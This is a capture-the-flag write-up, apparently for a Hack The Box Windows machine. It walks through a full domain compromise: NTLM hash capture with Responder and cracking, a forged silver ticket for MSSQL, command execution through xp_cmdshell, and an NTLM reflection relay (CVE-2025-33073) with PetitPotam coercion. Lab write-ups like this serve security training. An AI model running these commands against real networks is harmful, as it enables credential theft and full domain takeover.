Signed
by 0xW1LD
Enumeration
As is common in real life Windows penetration tests, you will start the Signed box with credentials for the following account which can be used to access the MSSQL service:
scott/Sm230#C5NatH
Scans
As usual we start off with an nmap port scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
PORT STATE SERVICE REASON VERSION
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.129.198.89:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-11T18:50:52
| Not valid after: 2055-10-11T18:50:52
| MD5: 0f0d:aab4:b50a:4923:c34b:f582:d0d7:7e31
| SHA-1: 8129:ef83:0469:0e3c:dca9:2742:122a:26e0:92af:ba22
| -----BEGIN CERTIFICATE-----
| MIIEADCCAmigAwIBAgIQHhrmYZjLM45C/QSbFaURejANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUxMDExMTg1MDUyWhgPMjA1NTEwMTExODUwNTJaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCAaIwDQYJKoZIhvcNAQEBBQADggGPADCCAYoCggGBAK39NqKO
| mfbn86epy1EzNkza5Gl5yB66I8PgpdJt657AZRUfUqVyTcM31zBWH+dsOa5OoDWn
| NSL2bJGRx0Aq8WF0tNOPoo0cu5XJADSTylLuwt4/W25PlqBN1LPbTDo4EFJe80U3
| 3J5II2yDiGbHxscHONThyPcIuuaDCuuvq34Ra1mANnpbJ6KFssIOLzLCZcEbfJDL
| Yc6irbLOV9wgCwyE8YoDiWrCSFjO4PDfFTpsRR21KBjf8MNqnM6Gil1m8XJOiAp7
| gMG8ElrxcjmN5zyrc3CbO0dVXLG6EqNokq+a/x2FRFAqnKgW6eloxx+qvqiNg+uU
| z5XHXoKLKh4PZc4nGwrYHFqELJmP73BiFoSnPVzeQUm+ccQYyjJaC+b5a8/p3LPN
| UOT2tpAlPGoci/BpcU4SY5lxnwIqrWVK5rzzAtxmOmeQCM3vcStF2VnwDKwEj2o3
| 4ZT0IqJO1d6fZ39FpIOP5h/7/vlubRybvZkepK+KHQERjAp+vhiqwgs2gQIDAQAB
| MA0GCSqGSIb3DQEBCwUAA4IBgQBluiUnXTN96/4GZeyaIVnnc3pscWA0Lqw1HiKe
| +5+n6FaXieOurWVFpUpIMx4etRjCkhmneKAyCBaFBnmA+f4kJo0YuYyssALfwHXd
| Sen2rObHnYMDQpwcg/ox9bDVW4UatQZsvAsK+L47Um/x/EwRR9QiYUigc9Le+MGS
| PLdXP6L7d/eo839f6XBO9YJRK2j2NAl6Cw3H0JcAX80JZw1t9WQa5ns9yYss11+I
| AcUaOLI3DZKRsLrO/U98sr6lTGCmX7/ZGOFbTn/Z27Yhj3AdbI2Ga3lvQZwVNDNj
| y4jUhwekK2CV6ytF3w5Z/6baOu684snijMbaa46k9HO2pX+wwnrbIELj/8Hs7f1y
| sSPdBpTyijWiKq+nZQCnWUkNOLi5hpVhHPCnIZrN3l6hHfEiCFtVziMcdSekJ8A+
| lNhjwh2HxYLZACIPuzFBlh/ZYS44F5CyS6erXsrojJITE7H3J5Hn7V5PumwLEXeF
| HPBD//Ptab2zIf4R/tbg7CAvaoE=
|_-----END CERTIFICATE-----
| ms-sql-ntlm-info:
| 10.129.198.89:1433:
| Target_Name: SIGNED
| NetBIOS_Domain_Name: SIGNED
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: SIGNED.HTB
| DNS_Computer_Name: DC01.SIGNED.HTB
| DNS_Tree_Name: SIGNED.HTB
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-10-11T20:03:51+00:00; 0s from scanner time.
MS-SQL
Of course given the assumed breach scenario we do know that he 1433 - MSSQL service is running and we can use the provided credentials to connect and do some enumeration.
1
2
3
4
5
6
7
8
9
10
11
SQL (scott guest@master)> select @@version;
Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
Oct 8 2022 05:58:25
Copyright (C) 2022 Microsoft Corporation
Enterprise Evaluation Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SQL (scott guest@master)> xp_dirtree
subdirectory depth file
------------ ----- ----
Foothold
Since we can do an xp_dirtree, let’s start up Responder
1
sudo responder -I tun0
Now let’s run an xp_dirtree pointed towards our ip and hope we get a hash we can crack.
1
2
3
SQL (scott guest@master)> xp_dirtree \\10.10.14.160\w1ld
subdirectory depth file
------------ ----- ----
Back in responder we get a hash!
1
2
3
[SMB] NTLMv2-SSP Client : 10.129.198.89
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:9b216e485839fa68:[REDACTED]
Let’s pass it over to hashcat and take a look.
1
2
3
hashcat -a 0 mssqlsvc.pem /usr/share/wordlists/rockyou.txt
<SNIP>
MSSQLSVC::SIGNED:9b216e485839fa68:[REDACTED]:[REDACTED]
Looks like we got a crack, let’s see if we can authenticate to the domain.
1
2
3
nxc mssql dc01.signed.htb -u mssqlsvc -p [REDACTED]
MSSQL 10.129.198.89 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)
MSSQL 10.129.198.89 1433 DC01 [+] SIGNED.HTB\mssqlsvc:[REDACTED]
Looks like we can authenticate, just like that we have a foothold!
User
Taking a look around we can find an interesting group SIGNED\IT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
SQL (SIGNED\mssqlsvc guest@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
--------------------------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 0 1 0 0 0 0 0 0 0
##MS_PolicyEventProcessingLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
##MS_PolicyTsqlExecutionLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
SIGNED\IT WINDOWS_GROUP 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLWriter WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\Winmgmt WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\MSSQLSERVER WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT AUTHORITY\SYSTEM WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
NT SERVICE\SQLSERVERAGENT WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLTELEMETRY WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
scott SQL_LOGIN 0 0 0 0 0 0 0 0 0
SIGNED\Domain Users WINDOWS_GROUP 0 0 0 0 0 0 0 0 0
Since we have authentication as a service account, I want to perform a Silver Ticket attack and impersonate the IT group, so let’s grab some data.
Let’s see if we can find the RID of the IT group.
1
2
3
nxc mssql $DC -u $USER -p $PASS --rid-brute
<SNIP>
MSSQL 10.129.198.89 1433 DC01 1105: SIGNED\IT
Now let’s grab our NTHASH, there’s a few ways to do this, I like using openssl
1
2
echo -n '[REDACTED]' | iconv -t utf16le | openssl dgst -md4
MD4(stdin)= ef69[REDACTED]
Now let’s also grab an SID first we have to grab the hex versions of the SID through MSSQL since it’s the only port open.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
SQL (SIGNED\mssqlsvc guest@master)> SELECT name as LoginName, master.dbo.fn_varbintohexstr(SUSER_SID(name)) AS SID_HEX, type_desc AS LoginType From sys.server_principals where type in ('U','G') ORDER BY create_date DESC;LoginName SID_HEX LoginType
------------------------- ------------------------------------------------------------------ -------------
SIGNED\Domain Users 0x0105000000000005150000005b7bb0f398aa2245ad4a1ca401020000 WINDOWS_GROUP
NT SERVICE\SQLTELEMETRY 0x010600000000000550000000447a1a9ee0235381234a54aa9bd0549c4fcc0642 WINDOWS_LOGIN
NT SERVICE\SQLSERVERAGENT 0x010600000000000550000000dca88f14b79fd47a992a3d8943f829a726066357 WINDOWS_LOGIN
NT AUTHORITY\SYSTEM 0x010100000000000512000000 WINDOWS_LOGIN
NT SERVICE\MSSQLSERVER 0x010600000000000550000000e20f4fe7b15874e48e19026478c2dc9ac307b83e WINDOWS_LOGIN
NT SERVICE\Winmgmt 0x0106000000000005500000005a048ddff9c7430ab450d4e7477a2172ab4170f4 WINDOWS_LOGIN
NT SERVICE\SQLWriter 0x010600000000000550000000732b9753646ef90356745cb675c3aa6cd6b4d28b WINDOWS_LOGIN
SIGNED\IT 0x0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000 WINDOWS_GROUP
Next let’s use a simple python script to convert the HEX into the SID format.
1
2
python3 -c "import sys; sid_hex='0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'; b=bytes.fromhex(sid_hex); print(f'S-{b[0]}-{int.from_bytes(b[2:8], \"big\")}-' + '-'.join(str(int.from_bytes(b[i:i+4], \"little\")) for i in range(8, len(b), 4)))"
S-1-5-21-4088429403-1159899800-2753317549-1105
Trim off the RID of the SIGNED\IT group, which was the hex ID I used. then we have a fully formed domain SID.
1
S-1-5-21-4088429403-1159899800-2753317549
Now let’s put it all together into a silver ticket attack using ticketer.py.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
ticketer.py -nthash $HASH -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain $D -spn $USER/$DC -groups 1105 Administrator
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
/home/kali/.local/bin/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for signed.htb/Administrator
/home/kali/.local/bin/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/home/kali/.local/bin/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/home/kali/.local/bin/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
/home/kali/.local/bin/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
Now if all goes well we should be able to authenticate to the mssql service as Administrator using this ticket.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
KRB5CCNAME=Administrator.ccache mssqlclient.py $DC -k -no-pass
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (SIGNED\Administrator dbo@master)>
Success! Now let’s check xp_cmdshell
1
2
3
4
5
6
7
8
9
SQL (SIGNED\Administrator dbo@master)> enable_xp_cmdshell
INFO(DC01): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(DC01): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SIGNED\Administrator dbo@master)> xp_cmdshell whoami
output
---------------
signed\mssqlsvc
NUL
Just like that, we have User!
Root
Grabbing a reverse shell, let’s take a look around, doing recon for local privilege escalation, the most interesting to note is that the entire active directory suite is actually running and listening.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
PS C:\Windows\system32> netstat -anop TCP
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 908
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 908
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:5986 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 1336
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 492
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1272
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 1520
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:49672 0.0.0.0:0 LISTENING 2292
TCP 0.0.0.0:49675 0.0.0.0:0 LISTENING 628
TCP 0.0.0.0:49678 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:64261 0.0.0.0:0 LISTENING 2044
TCP 0.0.0.0:65238 0.0.0.0:0 LISTENING 2960
TCP 10.129.139.69:53 0.0.0.0:0 LISTENING 2044
TCP 10.129.139.69:139 0.0.0.0:0 LISTENING 4
TCP 10.129.139.69:1433 10.10.14.18:54438 ESTABLISHED 924
TCP 10.129.139.69:64195 10.10.14.18:3232 ESTABLISHED 3848
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 2044
TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 924
You may use whatever method you want to expose these ports to our attacker machine, I used SOCKS PROXY.
1
2
3
proxychains -q nxc smb 127.0.0.1 -u $USER -p $PASS
SMB 127.0.0.1 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:SIGNED.HTB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 127.0.0.1 445 DC01 [+] SIGNED.HTB\mssqlsvc:[REDACTED]
Going back to domain privilege escalation enumeration we can find that it’s vulnerable to NTLM_REFLECTION (CVE-2025-33073)
1
2
3
4
proxychains -q nxc smb 127.0.0.1 -u $USER -p $PASS -M ntlm_reflection
SMB 127.0.0.1 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:SIGNED.HTB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 127.0.0.1 445 DC01 [+] SIGNED.HTB\mssqlsvc:[REDACTED]
NTLM_REF... 127.0.0.1 445 DC01 VULNERABLE (can relay SMB to other protocols except SMB on 127.0.0.1)
Interesting to note, that although
signingis enabled, which is one of the perceived requirements forCVE-2025-33073, it’s actually still possible to reflect to other services such as WINRMS and MSSQL, as can be seen in this thread
So let’s do an NTLM reflection attack, first let’s add the dns record pointing towards ourselves, note that I run this through proxychains but if we simply do that it also queries the localhost for the DNS which wont work so I added the dns-ip as well.
1
2
3
4
5
6
proxychains -q dnstool -u 'signed.htb\mssqlsvc' -p "$PASS" signed.htb -a add -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' -d '10.10.14.18' -dns-ip 10.129.139.69
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Check for the DNS record.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
dig localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.signed.htb @10.129.139.69
; <<>> DiG 9.20.11-4+b1-Debian <<>> localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.signed.htb @10.129.139.69
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44809
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.signed.htb. IN A
;; ANSWER SECTION:
localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.signed.htb. 180 IN A 10.10.14.18
;; Query time: 332 msec
;; SERVER: 10.129.139.69#53(10.129.139.69) (UDP)
;; WHEN: Mon Oct 13 01:28:06 EDT 2025
;; MSG SIZE rcvd: 109
Success, we got an answer and it points towards our ip! Let’s start an ntlmrelayx listener, make sure you have the latest version so that it can listen on winrms.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
proxychains -q ntlmrelayx.py -t "winrms://signed.htb" -smb2support
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Multirelay disabled
[*] Servers started, waiting for connections
Finally let’s coerce an authentication, you can use petitpotam for this, however NXC also provides the coerce_plus module which I will use now.
1
2
3
4
5
proxychains -q nxc smb 127.0.0.1 -u $USER -p $PASS -M coerce_plus -o L=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA M=petit
SMB 127.0.0.1 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:SIGNED.HTB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 127.0.0.1 445 DC01 [+] SIGNED.HTB\mssqlsvc:[REDACTED]
COERCE_PLUS 127.0.0.1 445 DC01 VULNERABLE, PetitPotam
COERCE_PLUS 127.0.0.1 445 DC01 Exploit Success, efsrpc\EfsRpcAddUsersToFile
If we check back in ntlmrelayx we find a successful authentication!
1
2
3
4
5
6
[*] (SMB): Received connection from 10.129.139.69, attacking target winrms://signed.htb
[!] The client requested signing, relaying to WinRMS might not work!
[*] HTTP server returned error code 500, this is expected, treating as a successful login
[*] (SMB): Authenticating connection from /@10.129.139.69 against winrms://signed.htb SUCCEED [1]
[*] winrms:///@signed.htb [1] -> Started interactive WinRMS shell via TCP on 127.0.0.1:11000
[*] All targets processed!
So let’s connect to this shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
nc localhost 11000
Type help for list of commands
# dir C:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is BED4-436E
Directory of C:\Users\Administrator\Desktop
10/06/2025 05:04 AM <DIR> .
10/06/2025 05:04 AM <DIR> ..
10/12/2025 07:22 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,072,795,136 bytes free
Just like that, we have Root!
tags: boxes - os/windows - diff/medium